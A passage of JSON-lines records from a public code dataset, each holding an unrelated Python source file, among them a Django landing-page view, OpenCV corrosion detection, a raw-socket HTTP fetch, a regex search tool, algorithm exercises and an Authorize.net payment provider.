\"\"\"\n recursion_01 tries to find all possible foldings of \n the protein by looking a set #steps (depth) ahead.\n \"\"\"\n # print the amount of recursions for convenience purposes\n if (self.recursionAmount % 10000 ) == 0 and self.recursionAmount > 0:\n print(\"Recusion Functionis called: \" + str(self.recursionAmount) + \" times\")\n self.recursionAmount = self.recursionAmount + 1\n\n # calculate the score of the grid when the set depth is reached or all amino acids are folded\n if depth == self.lookahead or len(allMoves) == self.length:\n S = grid.score()\n self.states = self.states + 1\n \n # update minimalScore & minimalGrid when a lower score is found(lower is better)\n if S <= self.minimalScore and (len(grid.checkPossibleMoves()) > 0 or self.protein.length == self.grid.totalMoves):\n self.minimalScore = S\n self.minimalGrid = grid\n self.minimalPerformedMove = firstMove\n \n else:\n\n # check the remaining possible moves for the current folding situation\n moves = grid.checkPossibleMoves()\n\n # TODO\n for move in moves:\n allMoves = allMoves[:(depth+(numberOfPerformedMoves))]\n allMoves.append(move)\n \n grid.clearGrid()\n\n for allMove in allMoves:\n grid.performMove(allMove, self.protein.code[grid.totalMoves])\n \n if depth == 0:\n self.recursion_01(grid, allMoves, depth+1, length, move, numberOfPerformedMoves)\n else:\n self.recursion_01(grid, allMoves, depth+1, length, firstMove, numberOfPerformedMoves)\n \n def changeMovesList(self):\n shift = self.protein.length\n self.allMoves = [(a-shift,b-shift) for a,b in self.allMoves]\n\n temp = []\n i = 0\n for tupl in self.allMoves:\n temp.append((self.protein.code[i],tupl))\n i = i + 1\n\n self.allMoves = temp\n\n","repo_name":"hattum/ijwit","sub_path":"algorithms/greedy_lookahead.py","file_name":"greedy_lookahead.py","file_ext":"py","file_size_in_byte":4351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74232055555","text":"from django.shortcuts import render\r\nfrom django.http import HttpResponse\r\nfrom django.contrib import messages\r\nfrom main.forms import RegisterGameForm\r\nfrom main.models import UserGame\r\n\r\n# Create your views here.\r\n\r\ndef get_index(request):\r\n context_dict={}\r\n\r\n if request.method == 'POST':\r\n form = RegisterGameForm(request.POST)\r\n if form.is_valid():\r\n name = form.cleaned_data['name']\r\n email = form.cleaned_data['email']\r\n\r\n userGame = UserGame()\r\n userGame.name = name\r\n userGame.email = email\r\n userGame.save()\r\n\r\n messages.add_message(request, messages.SUCCESS, 'Dados Salvos com Sucesso!')\r\n else:\r\n form = RegisterGameForm()\r\n\r\n context_dict['form'] = form\r\n \r\n\r\n return render(request, 'index.html', context_dict )\r\n","repo_name":"leonfritas/Landing-Page-CondutaZero92-Python","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23650543521","text":"# Python code for Corrosion Detection\n\nimport numpy as np\nimport cv2\n\n\n# read and capturing image\nimg = cv2.imread(\"tank2.jpeg\", cv2.IMREAD_COLOR)\n\n# Convert the imageFrame in\n# BGR(RGB color space) to\n# HSV(hue-saturation-value)\n# color space\nhsvFrame = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n\n# Set range for corrosion color and\n# define mask\ncorr_lower = np.array([0, 70, 70], np.uint8)\ncorr_upper = np.array([20, 200, 150], np.uint8)\ncorr_mask = cv2.inRange(hsvFrame, corr_lower, 
corr_upper)\n\t\n# Morphological Transform, Dilation\n# for each corrosion color and bitwise_and operator\n# between imageFrame and mask determines\n# to detect only that particular corrosion color\nkernal = np.ones((5, 5), \"uint8\")\n\t\n# For corrosion color\ncorr_mask = cv2.dilate(corr_mask, kernal)\nres_corr = cv2.bitwise_and(img, img,\n\t\t\t\t\t\tmask = corr_mask)\n\n# Creating contour to track corrosion color\ncontours, hierarchy = cv2.findContours(corr_mask,\n\t\t\t\t\t\t\t\t\tcv2.RETR_TREE,\n\t\t\t\t\t\t\t\t\tcv2.CHAIN_APPROX_SIMPLE)\n\t\nfor pic, contour in enumerate(contours):\n area = cv2.contourArea(contour)\n if(area > 300):\n x, y, w, h = cv2.boundingRect(contour)\n imageFrame = cv2.rectangle(img, (x, y),\n (x + w, y + h),\n (0, 0, 255), 2)\n \n cv2.putText(img, \"Corrosion\", (x, y),\n cv2.FONT_HERSHEY_SIMPLEX, 1.0,\n (0, 0, 255))\t\n\t\t\t\n# Program Termination\ncv2.imshow(\"Corrosion Detection\", cv2.resize(img, (1000, 800)))\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"Dr-MarcusI/Computer-Vision-for-Corrosion-Detection","sub_path":"Corrosion_Detection_v1.py","file_name":"Corrosion_Detection_v1.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
{"seq_id":"6002384140","text":"\n# requests -> urllib -> socket\nimport socket\nfrom urllib.parse import urlparse\n\n\ndef get_url(url):\n # fetch the html through a raw socket\n url = urlparse(url)\n # netloc() has done the parsing for us, extracting the host name\n host = url.netloc\n path = url.path\n if path == \"\":\n path = \"/\"\n\n # establish the connection\n # AF_INET specifies the address family, SOCK_STREAM the corresponding protocol\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # step 2: connect the host and port; 0.0.0.0 would be reachable via IP, while 127.0.0.1 would only be reachable from this machine\n client.connect((host, 80))\n\n client.send(\"GET {} HTTP/1.1\\r\\nHost:{}\\r\\nConnection:close\\r\\n\\r\\n\".format(path, host).encode(\"utf8\"))\n\n data = b\"\"\n while True:\n d = client.recv(1024)\n if d:\n data += d\n else:\n break\n data = data.decode(\"utf8\")\n print(data)\n client.close()\n\n\nif __name__ == \"__main__\":\n get_url(\"http://www.baidu.com\")\n\n","repo_name":"tang1323/Ing_Interview","sub_path":"sample/chapter10/socket_http.py","file_name":"socket_http.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
{"seq_id":"13873733079","text":"# exhaustive search via recursion\n# times out, so pruning is required\n\ndef dfs(start, mw, path, summit):\n print(start)\n global intens\n\n if start in summits_:\n return\n\n if start in gates_:\n # print(\"SEX\", intens)\n global tot\n\n if mw <= intens:\n intens = mw\n\n tot.append([intens, summit])\n return\n\n for nn in graph[start]:\n\n node, nw = nn\n if node in path:\n continue\n if nw > intens:\n continue\n else:\n mw_ = max(mw, nw)\n dfs(node, mw_, path + [node], summit)\n\ngates_ = []\nsummits_ = []\nn_ = 0\ngraph = []\ntot = []\nintens = 1e9\n\ndef solution(n, paths, gates, summits):\n global gates_, summits_, n_, graph\n gates_ = gates\n summits_ = summits\n n_ = n + 1\n\n graph = [[] for _ in range(n_)]\n\n for path in paths:\n a, b, c = path\n graph[a].append((b, c))\n graph[b].append((a, c))\n\n\n for summit in summits_:\n print(\"GA\", summit)\n for nd in graph[summit]:\n dfs(nd[0], nd[1], [summit], summit)\n\n tot.sort()\n print(tot)\n # a : intens, b: summit\n a, b = tot[0]\n answer = [b, a]\n return answer\n\nprint(solution(5, [[1, 3, 10], [1, 4, 20], [2, 3, 4], [2, 4, 6], [3, 5, 20], [4, 5, 6]], [1, 2], 
[5]))\n","repo_name":"whiskey21/my-algorithm-book","sub_path":"카카오기출/등산코스정하기_재귀.py","file_name":"등산코스정하기_재귀.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74923615553","text":"import numpy\nimport copy\n\ndef mutate(ind, prob_mutation = 0.9):\n \"\"\" Mutation function.\"\"\"\n gen_size = len(ind['genotype'])\n new_gen = copy.deepcopy(ind['genotype'])\n for i in range(gen_size):\n if numpy.random.uniform() < prob_mutation:\n new_gen[i] = numpy.random.uniform()\n \n return {'genotype': new_gen}","repo_name":"jessicamegane/pge","sub_path":"pge/core/operators/mutation.py","file_name":"mutation.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"8275676365","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport argparse\nimport sys\nimport re\n\n__author__ = 'Mor Kalfon'\n__version__ = '1.0'\n__email__ = 'zefferno@gmail.com'\n__license__ = 'Apache'\n__program_name__ = 're_search'\n__description__ = \"Search for Regular Expression pattern in one or more files\"\n\n\"\"\"\nThis script searches for one or more named input files or lines containing \na match to a regular expression pattern (given on command line as well).\n\"\"\"\n\nclass MatchOutputFormat(object):\n \"\"\" Prototype for match output format \"\"\"\n\n def __init__(self, filename, line_no, line, matches):\n \"\"\"\n Initialize MatchOutputFormat\n \n Arguments:\n filename: (str) File name of the match\n line_no: (int) Line number\n line: (str) Line text\n matches: (list) List of tuples that contain start, end positions for text matches\n \"\"\"\n self.filename = filename\n self.line_no = line_no\n self.line = line\n self.matches = matches\n\n def __str__(self):\n pass\n\n\nclass StandardOutputFormat(MatchOutputFormat):\n \"\"\"Compute string representation of Standard Output Format\"\"\"\n\n def __str__(self):\n if self.matches:\n return '[ Filename: {}, Line: {} ]\\n{}'.format(self.filename, self.line_no, self.line)\n return ''\n\n\nclass MachineOutputFormat(MatchOutputFormat):\n \"\"\"Compute string representation of Machine Output Format\"\"\"\n\n def __str__(self):\n out = ''\n\n # Format match result for each match\n for match in self.matches:\n out += '{}:{}:{}:{}\\n'.format(self.filename,\n self.line_no,\n match[0],\n self.line[match[0]:match[1]])\n return out\n\n\nclass UnderscoreOutputFormat(MatchOutputFormat):\n \"\"\"Compute string representation of Underscore Output Format\"\"\"\n\n def __str__(self):\n if not self.matches:\n return ''\n\n # Build terminal line in list representation\n temp = [' '] * len(self.line)\n\n # Add underscore for matched objects\n for match in self.matches:\n for i in range(match[0], match[1]):\n temp[i] = '^'\n\n return '[ Filename: {}, Line: {} ]\\n{}'.format(self.filename, self.line_no, self.line) + ''.join(temp) + 
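# The hiking-course record above brute-forces every gate-to-summit path and
# its own header admits it times out. The standard fix is a Dijkstra variant
# that relaxes on max(edge) instead of sum(edge), seeded from all gates at
# once. A hedged sketch of that idea (not the record's code):
import heapq

def min_intensity(n, paths, gates, summits):
    graph = [[] for _ in range(n + 1)]        # nodes are numbered 1..n
    for a, b, w in paths:
        graph[a].append((b, w))
        graph[b].append((a, w))
    best = [float('inf')] * (n + 1)
    pq = [(0, g) for g in gates]              # every gate is a zero-cost source
    for g in gates:
        best[g] = 0
    heapq.heapify(pq)
    summit_set = set(summits)
    while pq:
        cost, node = heapq.heappop(pq)
        if cost > best[node] or node in summit_set:
            continue                          # stale entry, or a summit endpoint
        for nxt, w in graph[node]:
            cand = max(cost, w)               # intensity = worst edge on the route
            if cand < best[nxt]:
                best[nxt] = cand
                heapq.heappush(pq, (cand, nxt))
    # smallest intensity, ties broken by the lowest summit number
    return min(([s, best[s]] for s in summits), key=lambda x: (x[1], x[0]))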
\n\n\nclass ColorOutputFormat(MatchOutputFormat):\n    \"\"\"Compute string representation of Color Output Format\"\"\"\n\n    @staticmethod\n    def __get_term_color(color):\n        \"\"\"\n        Get ansi terminal color code\n\n        Arguments:\n        color: (str) Color name\n\n        Returns:\n        Terminal color code\n        \"\"\"\n        color = color.lower().strip()\n\n        if color == 'yellow':\n            return '\\033[1;33m'\n        elif color == 'none':\n            return '\\033[0;0m'\n\n    def __str__(self):\n        out = ''\n        anchor = 0\n\n        if not self.matches:\n            return out\n\n        # Matched text in color\n        for match in self.matches:\n            out += self.line[anchor:match[0]]\n            out += self.__get_term_color('yellow') + self.line[match[0]:match[1]] + self.__get_term_color('none')\n            anchor = match[1]\n\n        # Append the rest of the string\n        out += self.line[self.matches[-1][1]:]\n\n        return '[ Filename: {}, Line: {} ]\\n{}'.format(self.filename, self.line_no, out)\n\n\ndef args_parser():\n    \"\"\"\n    Handle program arguments\n\n    Returns:\n    Parsed arguments\n    \"\"\"\n    parser = argparse.ArgumentParser(prog=__program_name__, description=__description__)\n    parser.add_argument('pattern', type=str, help='Regular Expression pattern')\n    parser.add_argument('file', nargs='*', type=argparse.FileType('r'), default=sys.stdin,\n                        help='one or more input files, if not specified, stdin is used as input')\n\n    group = parser.add_mutually_exclusive_group()\n    group.add_argument('-u', '--underscore', action='store_true', help='prints \"^\" under the matching text')\n    group.add_argument('-c', '--color', action='store_true', help='highlights matching text')\n    group.add_argument('-m', '--machine', action='store_true', help='generate machine readable output: '\n                                                                    'file_name:no_line:start_pos:matched_text')\n\n    return parser.parse_args()\n\n\ndef main():\n    args = args_parser()\n\n    try:\n        re_match = re.compile(args.pattern)\n    except re.error:\n        print(\"ERROR: Check your RegEx input!\")\n    else:\n        for f in args.file:\n            screen_output = ''\n\n            for line_no, line in enumerate(f):\n                match_list = list()\n                line_no += 1\n\n                for match in re_match.finditer(line):\n                    match_list.append(match.span())\n\n                if args.color:\n                    screen_output += str(ColorOutputFormat(f.name, line_no, line, match_list))\n                elif args.underscore:\n                    screen_output += str(UnderscoreOutputFormat(f.name, line_no, line, match_list))\n                elif args.machine:\n                    screen_output += str(MachineOutputFormat(f.name, line_no, line, match_list))\n                else:\n                    screen_output += str(StandardOutputFormat(f.name, line_no, line, match_list))\n\n                del match_list\n\n            if screen_output:\n                print(screen_output)\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"zefferno/scripts","sub_path":"re_search.py","file_name":"re_search.py","file_ext":"py","file_size_in_byte":6060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"26091072795","text":"class DisjointSet:\n    def __init__(self, graphs):\n        self.roots = graphs\n        self.rank = {}\n        for k, v in self.roots.items():\n            self.rank[k] = 0\n    def get(self, x):\n        if self.roots[x] != x:\n            self.roots[x] = self.get(self.roots[x])\n        return self.roots[x]\n    def union(self, x, y):\n        rootX = self.get(x)\n        rootY = self.get(y)\n        # if rootX == rootY:\n        #     return \n        # if self.rank[rootX] == self.rank[rootY]:\n        #     self.roots[rootX] = rootY\n        #     self.rank[rootX] += 1\n        # if self.rank[rootX] > self.rank[rootY]:\n        #     self.roots[rootX] = rootY\n        # else:\n        #     self.roots[rootY] = rootX\n        self.roots[rootX] = rootX\n        self.roots[rootY] = rootX\n        self.roots[x] = rootX\n        self.roots[y] = rootX\n    def isConnected(self, u, v):\n        return self.get(u) == self.get(v)
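# [Editor's note] The union() above leaves the rank bookkeeping commented out and always
# re-roots on rootX, which can build tall trees. A minimal standalone sketch of the
# union-by-rank (plus path-halving find) that the commented code was reaching for; this
# is illustrative, not the record's own implementation:
parent, rank = {}, {}

def find(x):
    while parent[x] != x:
        parent[x] = parent[parent[x]]  # path halving keeps lookups near O(1)
        x = parent[x]
    return x

def union(x, y):
    rx, ry = find(x), find(y)
    if rx == ry:
        return
    if rank[rx] < rank[ry]:
        rx, ry = ry, rx                # hang the shallower tree under the deeper one
    parent[ry] = rx
    if rank[rx] == rank[ry]:
        rank[rx] += 1

for node in ("a", "b", "c"):
    parent[node], rank[node] = node, 0
union("a", "b")
print(find("b") == find("a"))          # True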
\nclass Solution:\n    def accountsMerge(self, accounts: List[List[str]]) -> List[List[str]]:\n        # email map\n        parent_store = {}\n        graphs = {}\n        for r in range(len(accounts)):\n            par = accounts[r][0]\n            for c in range(1, len(accounts[r])):\n                parent_store[accounts[r][c]] = par\n                graphs[accounts[r][c]] = accounts[r][c]\n        ds = DisjointSet(graphs)\n        for i in range(len(accounts)):\n            for j in range(1, len(accounts[i]) - 1):\n                ds.union(accounts[i][j], accounts[i][j + 1])\n\n        ans = collections.defaultdict(list)\n        for k, v in ds.roots.items():\n            pr = ds.get(k)\n            ans[pr].append(k)\n        res = []\n        for key, val in ans.items():\n            temp = [parent_store[key]]\n            temp.extend(sorted(val))\n            res.append(temp)\n        return res","repo_name":"Rediet-Ferew/competitive-programming","sub_path":"accounts-merge.py","file_name":"accounts-merge.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"32704513246","text":"from utils.inference import inference\r\nimport numpy as np\r\nfrom medpy import metric\r\nimport time\r\n\r\n\r\ndef average_performance(targets, segmentations, performance_func):\r\n    arr = zip(targets, segmentations)\r\n    s = 0\r\n    for target, segmentation in arr:\r\n        s += performance_func(segmentation, target)\r\n    return s/len(targets)\r\n\r\n\r\ndef get_average_metric(net, dataset, metric_name):\r\n    performance_func_arr = {\r\n        'dice': metric.dc,\r\n        'sensitivity': metric.sensitivity,\r\n        'specificity': metric.specificity,\r\n        'precision': metric.precision,\r\n        'assd': metric.assd\r\n    }\r\n\r\n    targets = []\r\n    segmentations = []\r\n    print(f'Computing average {metric_name}; {len(dataset)} samples to evaluate')\r\n    for ct, target_mask in dataset:\r\n        targets.append(target_mask[0])\r\n        output = inference(net, ct[0], binary=True)\r\n        segmentations.append(output)\r\n    performance = average_performance(targets, segmentations, performance_func=performance_func_arr[metric_name])\r\n    print(f'Finished; average {metric_name}: {performance}')\r\n    return performance\r\n\r\n\r\ndef get_all_metrics(net, dataset):\r\n    performance_func_arr = {\r\n        'dice': metric.dc,\r\n        'sensitivity': metric.sensitivity,\r\n        'specificity': metric.specificity,\r\n        'precision': metric.precision,\r\n        'assd': metric.assd\r\n    }\r\n\r\n    metrics = dict()\r\n\r\n    targets = []\r\n    segmentations = []\r\n    print(f\"Computing metrics; {len(dataset)} samples to evaluate\")\r\n    print('Computing the average runtime metric')\r\n    t = time.time()\r\n    for ct, target_mask in dataset:\r\n        targets.append(target_mask[0])\r\n        output = inference(net, ct[0], binary=True)\r\n        segmentations.append(output)\r\n\r\n    average_time = (time.time()-t)/len(dataset)\r\n    key = 'average inference time'\r\n    metrics[key] = average_time\r\n\r\n    print(f'Computing the average quality metrics')\r\n    print(f'{key}:{average_time}')\r\n    for metric_name in performance_func_arr:\r\n        performance = average_performance(targets, segmentations, performance_func=performance_func_arr[metric_name])\r\n        key = 'average '+metric_name\r\n        value = performance\r\n        print(f'{key}:{value}')\r\n        metrics[key] = value\r\n    print('Metric computation finished')\r\n    return metrics\r\n\r\n\r\n# The concrete metric implementations are below; inputs and outputs are 2D numpy arrays of the images\r\n\r\n\r\n# # Dice metric\r\n# def dice(tar, seg):\r\n#     # smoothing term, used to keep the denominator from being 0\r\n#     smooth = 1\r\n#     intersection = (tar.flatten()*seg.flatten()).sum()\r\n#     return (2 * intersection + smooth)/(tar.sum()+seg.sum()+smooth)\r\n#\r\n#\r\n# # Precision metric\r\n# def PPV(tar, seg):\r\n#     predict = np.atleast_1d(seg.astype(np.bool))\r\n#     target = np.atleast_1d(tar.astype(np.bool))\r\n#\r\n#
tp = np.count_nonzero(predict & target)\r\n# fp = np.count_nonzero(predict & ~target)\r\n#\r\n# try:\r\n# p = tp / float(tp + fp)\r\n# except ZeroDivisionError:\r\n# p = 0.0\r\n# return p\r\n\r\n\r\n","repo_name":"HeLingfei/Circle-UNet","sub_path":"utils/performance.py","file_name":"performance.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9336816741","text":"from resorts import verify_input\r\nfrom message import carriers\r\n\r\ndef validate_args(args):\r\n if not verify_input(args.mountain):\r\n return False\r\n\r\n date = args.date.split('/')\r\n if (len(date) != 3 or len(date[0]) != 2 or len(date[1]) != 2 or len(date[2]) != 4\r\n or not date[0].isdigit() or not date[1].isdigit() or not date[2].isdigit()):\r\n return False\r\n\r\n if ((args.phone and not args.carrier) or (args.phone and not args.phone.isdigit())\r\n or (args.carrier and args.carrier not in carriers)):\r\n return False\r\n\r\n return True\r\n","repo_name":"daltonherrold/Lift_Tickets","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"10060324523","text":"from os import PathLike\nfrom allocation_language.alloc_lang_data_containers.event_dataclasses import EventData\nimport allocation_language.lexer as lexer_module\nfrom allocation_language.parser import parser\nimport random\nimport sys\n\ndef _make_contract(text_content: str):\n lexer = lexer_module.make_new_lexer()\n token_stream = lexer.lex(text_content)\n \n contract = parser.parse(token_stream)\n return contract\n \ndef make_contract_from_file(file_src: PathLike):\n with open(file_src, \"r\") as src_file:\n return _make_contract(src_file.read())\n\ndef make_contract_from_text(text_content: str):\n return _make_contract(text_content)\n\ndef make_test_events(n=10):\n for _ in range(n):\n yield EventData(\n data = {\n \"type\": random.choice(['A', 'B', 'C']),\n \"claim\": random.randint(1, 5e5),\n \"liable\": 0,\n \"revenue\": random.randint(1, 5e5)\n }\n )\n\n\n\"\"\" Testing code, not part of library. 
\"\"\"\ndef _test_contract():\n contract = make_contract_from_file(f\"./src/allocation_language/test_files/{sys.argv[1]}\")\n contract.update(\"testvar\", 1e5)\n events = list(make_test_events(50000))\n events = contract.evaluate_stream(events)\n for event in events:\n print(event)\n \ndef __main():\n import cProfile\n import pstats\n\n with cProfile.Profile() as pr:\n _test_contract()\n\n stats = pstats.Stats(pr)\n stats.sort_stats(pstats.SortKey.TIME)\n # stats.print_stats()\n stats.dump_stats('profiling_test_stats.prof')\n\nif __name__ == \"__main__\":\n __main()","repo_name":"tm2josep/allocation_language","sub_path":"src/allocation_language/make_contract.py","file_name":"make_contract.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18150219827","text":"import sys\nfrom itertools import combinations\nsys.stdin = open('input.txt', \"r\")\n\nN,L,R,X = map(int, sys.stdin.readline().rstrip().split())\nnumbers = list(map(int, sys.stdin.readline().rstrip().split()))\n\nanswer = 0\nfor i in range (2,N+1):\n for c in combinations(numbers,i):\n hap = sum(c)\n upper = max(c)\n lower = min(c)\n \n if L <= hap <= R and upper-lower >= X:\n answer += 1\nprint(answer)","repo_name":"aver1001/Problem-Solving","sub_path":"풀이 완료/16938/acmicpc.py","file_name":"acmicpc.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20476418718","text":"from unidecode import unidecode\nimport urllib2\nfrom django.utils.translation import ugettext as _\nfrom satchless.delivery.models import DeliveryVariant, PhysicalShippingVariant\nfrom satchless.payment import PaymentProvider, PaymentFailure\nfrom authorizenet.utils import process_payment\n\nfrom . import forms\nfrom . 
import models\n\nclass AuthorizeNetProvider(PaymentProvider):\n unique_id = 'authorize.net'\n form_class = forms.PaymentForm\n\n def __init__(self, capture=True):\n self.capture = capture\n\n def enum_types(self, order=None, customer=None):\n return (('authorizenet', 'Authorize.net'),)\n\n def get_configuration_form(self, order, typ, data):\n instance = models.AuthorizeNetVariant(order=order, price=0)\n return self.form_class(data or None, instance=instance)\n\n def create_variant(self, order, typ, form):\n return form.save()\n\n def get_shipping_data(self, order):\n result = {}\n for dg in order.groups.all():\n try:\n shipping = dg.deliveryvariant.get_subtype_instance()\n if isinstance(shipping, PhysicalShippingVariant):\n result['ship_to_first_name'] = shipping.shipping_first_name\n result['ship_to_last_name'] = shipping.shipping_last_name\n result['ship_to_company'] = shipping.shipping_company_name\n address = filter(None,\n [shipping.shipping_street_address_1,\n shipping.shipping_street_address_2])\n result['ship_to_address'] = '\\n'.join(address)\n result['ship_to_city'] = shipping.shipping_city\n result['ship_to_state'] = shipping.shipping_country_area\n result['ship_to_zip'] = shipping.shipping_postal_code\n result['ship_to_country'] = shipping.get_shipping_country_display()\n break\n except DeliveryVariant.DoesNotExist:\n pass\n return result\n\n def get_billing_data(self, order):\n result = {}\n result['first_name'] = order.billing_first_name\n result['last_name'] = order.billing_last_name\n result['company'] = order.billing_company_name\n address = filter(None,\n [order.billing_street_address_1,\n order.billing_street_address_2])\n result['address'] = '\\n'.join(address)\n result['city'] = order.billing_city\n result['state'] = order.billing_country_area\n result['zip'] = order.billing_postal_code\n result['country'] = order.get_billing_country_display()\n result['phone'] = order.billing_phone\n if order.user:\n result['cust_id'] = str(order.user.pk)\n result['email'] = order.user.email\n return result\n\n def confirm(self, order):\n v = order.paymentvariant.get_subtype_instance()\n trans_type = self.capture and 'AUTH_CAPTURE' or 'AUTH_ONLY'\n data = {\n 'card_num': v.cc_number,\n 'exp_date': v.cc_expiration,\n 'amount': order.total().gross,\n 'invoice_num': order.pk,\n 'type': trans_type,\n }\n if v.cc_cvv2:\n data['card_code'] = v.cc_cvv2\n data.update(self.get_billing_data(order))\n data.update(self.get_shipping_data(order))\n data = dict((k, unidecode(v) if isinstance(v, unicode) else v)\n for k, v in data.items())\n try:\n response = process_payment(data, {})\n except urllib2.URLError:\n raise PaymentFailure(_(\"Could not connect to the gateway.\"))\n v.cc_cvv2 = '' # Forget the CVV2 number immediately after the transaction\n v.response = response\n v.save()\n if not response.is_approved:\n raise PaymentFailure(response.response_reason_text)\n\nclass AuthorizeNetPreauthProvider(AuthorizeNetProvider):\n def __init__(self):\n return super(AuthorizeNetPreauthProvider, self).__init__(capture=False)\n","repo_name":"tbarbugli/satchless_heroku_skeleton","sub_path":"py/satchless/contrib/payment/authorizenet_provider/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"23575581291","text":"import numpy as np\n\n\ndef arrange(initials):\n for i in range(len(initials)):\n prev_val = '?'\n for j in range(len(initials[0])):\n if (initials[i])[j] != 
'?':\n prev_val = (initials[i])[j]\n else:\n (initials[i])[j] = prev_val\n # print(initials)\n return initials\n\n\ndef reverse(hlist):\n rev = []\n for l in hlist:\n rev.append(l[::-1])\n return rev\n\n\ndef run():\n inp = input()\n R, C = (int(i) for i in inp.split(' '))\n hlist = []\n for index in range(R):\n hlist.append(list(input()))\n\n hlist = arrange(hlist)\n hlist = reverse(arrange(reverse(hlist)))\n\n hlist = np.array(hlist)\n\n hlist = arrange(hlist.T)\n hlist = reverse(arrange(reverse(hlist)))\n hlist = np.array(hlist).T\n\n for x in hlist:\n print(''.join(x))\n\n\nif __name__ == '__main__':\n for case in range(int(input())):\n print(\"Case #%d: \" % (case + 1))\n run()\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_203/440.py","file_name":"440.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28096922469","text":"class Solution:\n def __init__(self, str1, str2, length1, length2):\n self.str1 = str1\n self.str2 = str2\n self.n = length1\n self.m = length2\n self.memo = list()\n\n for i in range(self.n + 1):\n row = list()\n for j in range(self.m + 1):\n row.append(-1)\n self.memo.append(row)\n for x in self.memo:\n print(x)\n\n def solve(self):\n return self.get_lcs(self.n, self.m)\n\n def get_lcs(self, n, m):\n print(f'n: {n}, m: {m}')\n if n == 0 or m == 0:\n return 0\n\n if self.memo[n][m] != -1:\n return self.memo[n][m]\n else:\n if self.str1[n-1] == self.str2[m-1]:\n value = 1 + self.get_lcs(n-1, m-1)\n self.memo[n][m] = value\n return value\n\n if self.str1[n-1] != self.str2[m-1]:\n value = max(self.get_lcs(n-1, m), self.get_lcs(n, m-1))\n self.memo[n][m] = value\n return value\n\nif __name__ == '__main__':\n a1 = 'abcdgrh'\n a2 = 'abedfhr'\n obj = Solution(a1, a2, len(a1), len(a2))\n ans = obj.solve()\n print(ans)\n","repo_name":"navkant/ds_algo_practice","sub_path":"dynamic_programming2/lcs/lcs_memo.py","file_name":"lcs_memo.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14797083588","text":"import re\nfrom io import BytesIO\n\nfrom django.contrib.auth.decorators import permission_required, login_required\nfrom django.http import Http404, HttpResponse\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.template import Template, Context\nfrom django.utils import timezone\nfrom django.utils.translation import gettext as _\nfrom xlsxwriter import Workbook\n\nfrom juntagrico import version\nfrom juntagrico.config import Config\nfrom juntagrico.dao.mailtemplatedao import MailTemplateDao\nfrom juntagrico.dao.memberdao import MemberDao\nfrom juntagrico.dao.sharedao import ShareDao\nfrom juntagrico.dao.subscriptiondao import SubscriptionDao\nfrom juntagrico.dao.subscriptionpartdao import SubscriptionPartDao\nfrom juntagrico.dao.subscriptionsizedao import SubscriptionSizeDao\nfrom juntagrico.entity.depot import Depot\nfrom juntagrico.entity.jobs import ActivityArea\nfrom juntagrico.entity.member import Member\nfrom juntagrico.entity.share import Share\nfrom juntagrico.mailer import append_attachements\nfrom juntagrico.mailer import formemails\nfrom juntagrico.util import return_to_previous_location, addons\nfrom juntagrico.util.management_list import get_changedate\nfrom juntagrico.util.pdf import return_pdf_http\nfrom juntagrico.util.subs import subscriptions_with_assignments\nfrom 
